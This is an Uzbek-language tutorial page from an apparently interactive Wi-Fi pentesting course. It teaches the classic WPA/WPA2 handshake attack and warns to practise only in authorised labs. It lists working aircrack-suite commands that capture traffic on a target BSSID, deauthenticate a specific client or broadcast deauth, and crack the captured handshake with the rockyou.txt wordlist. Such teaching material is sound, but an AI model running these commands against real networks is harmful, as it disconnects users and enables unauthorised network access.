Modulga qaytish 0%
O'quv darsi / Wi-Fi Pentesting (WPA/WPA2)
Klassik Handshake hujumi
Agar tarmoqda faol mijoz bo'lsa, uni qisqa muddatga uzib, qayta ulanish vaqtida WPA handshake'ni ushlaymiz va lug'at hujumi bilan parolni topishga harakat qilamiz.
25 daq.ilg'or4 komanda3/8
Maqsadlar
- Maqsadli yozuvni boshlash
- Deauth hujumi
- Lug'at hujumi
Faqat ruxsat etilgan muhitda mashq qiling
Bu darsdagi buyruqlar o'quv simulyatori va o'zingizga tegishli lablar uchun. Begona tizimlarni skanlash yoki sinash qonuniy javobgarlikka olib keladi.
O'qish
1. Yozuvni boshlash
Maqsadli kanal va BSSID bo'yicha airodump-ng ni ishga tushiring va capture_handshake fayliga yozing.
2. Deauthentication
Yangi terminalda mijozni qisqa muddatga uzing. Birinchi terminalda 'WPA handshake: ...' yozuvi paydo bo'lsa, Ctrl+C bilan to'xtating.
3. Parolni qidirish
rockyou.txt lug'ati bilan aircrack-ng ishga tushiring. Parol lug'atda bo'lsa, KEY FOUND! ekrani chiqadi.
Komandalar
Run tugmasi buyruqni o'ngdagi simulyatorga yuboradi; Copy esa real Kali terminalingiz uchun.
$
sudo airodump-ng -c 5 --bssid 7C:8B:CA:B8:B3:B4 -w capture_handshake wlan0mon$
sudo aireplay-ng -0 5 -a 7C:8B:CA:B8:B3:B4 -c A4:6B:40:79:76:AE wlan0monMaqsadli mijoz
$
sudo aireplay-ng -0 5 -a 7C:8B:CA:B8:B3:B4 wlan0monBroadcast deauth
$
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture_handshake-01.cap